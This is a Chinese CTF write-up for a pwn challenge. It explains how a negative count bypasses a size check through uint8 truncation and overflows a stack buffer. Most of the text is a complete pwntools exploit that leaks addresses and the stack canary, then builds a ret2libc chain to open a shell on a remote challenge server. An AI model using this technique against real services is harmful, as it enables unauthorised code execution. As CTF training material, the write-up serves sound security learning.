难度不大,要求输入n个数,但栈空间只能放127个数,要求输入数<127但可以输入负数,其它地址在输入debug时可以全部得到。
这里由于没有中途退出机制,需要精确的输入一个负数表示执行次数
v6 = get_long("Number of numbers to add");
if ( v6 <= 127 )
{
get_data(v8, (unsigned __int8)v6); // 输入负数里,在这里用int8转成正数
v7 = add_nums(v8, (unsigned __int8)v6);
printf("Total is %ld\n", v7);
result = 0;
}负数表示的次数为 n-256 这里需要输入133个,输入数字为133-256=-123
然后输入padding,canary,rbp,pop_rdi+1,pop_rdi,bin_sh,system
from pwn import *
elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'
def connect():
global p,libc_elf,one,libc_start_main_ret,local
local = 0
if local == 1:
p = process('./pwn')
libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
one = [0x4240e, 0x42462, 0xc4f7f, 0xe31fa, 0xe31ee]
libc_start_main_ret = 0x21a87
else:
p = remote('node4.buuoj.cn', 28595)
libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
libc_start_main_ret = 0x21b97
def pwn():
p.sendlineafter(b'Number of numbers to add> ', '-123')
p.sendlineafter(b'> ', b'debug')
p.recvuntil(b'@ ')
pwn_base = int(p.recvline(), 16) - elf.sym['main']
p.recvuntil(b'@ ')
libc_base = int(p.recvline(), 16) - libc_elf.sym['printf']
p.recvuntil(b'RBP is ')
rbp_addr = int(p.recvline(), 16)
canary_addr = hex(rbp_addr -0x10).encode()
while True:
v = p.readline()
if canary_addr in v:
canary = u64(bytes.fromhex((v[42:65].replace(b' ',b'')).decode() ))
print('canary:', hex(canary))
break
print(hex(pwn_base), hex(libc_base), hex(canary))
libc_elf.address = libc_base
pop_rdi = next(libc_elf.search(asm('pop rdi; ret')))
bin_sh = next(libc_elf.search(b'/bin/sh'))
system = libc_elf.sym['system']
for i in range(127):
p.sendlineafter(b'> ', b'0')
p.sendlineafter(b'> ', str(canary).encode())
p.sendlineafter(b'> ', b'0')
p.sendlineafter(b'> ', str(pop_rdi+1).encode())
p.sendlineafter(b'> ', str(pop_rdi).encode())
p.sendlineafter(b'> ', str(bin_sh).encode())
p.sendlineafter(b'> ', str(system).encode())
#p.sendlineafter(b'> ', b'0')
p.sendlineafter(b'\n', b'cat /flag')
p.interactive()
connect()
pwn()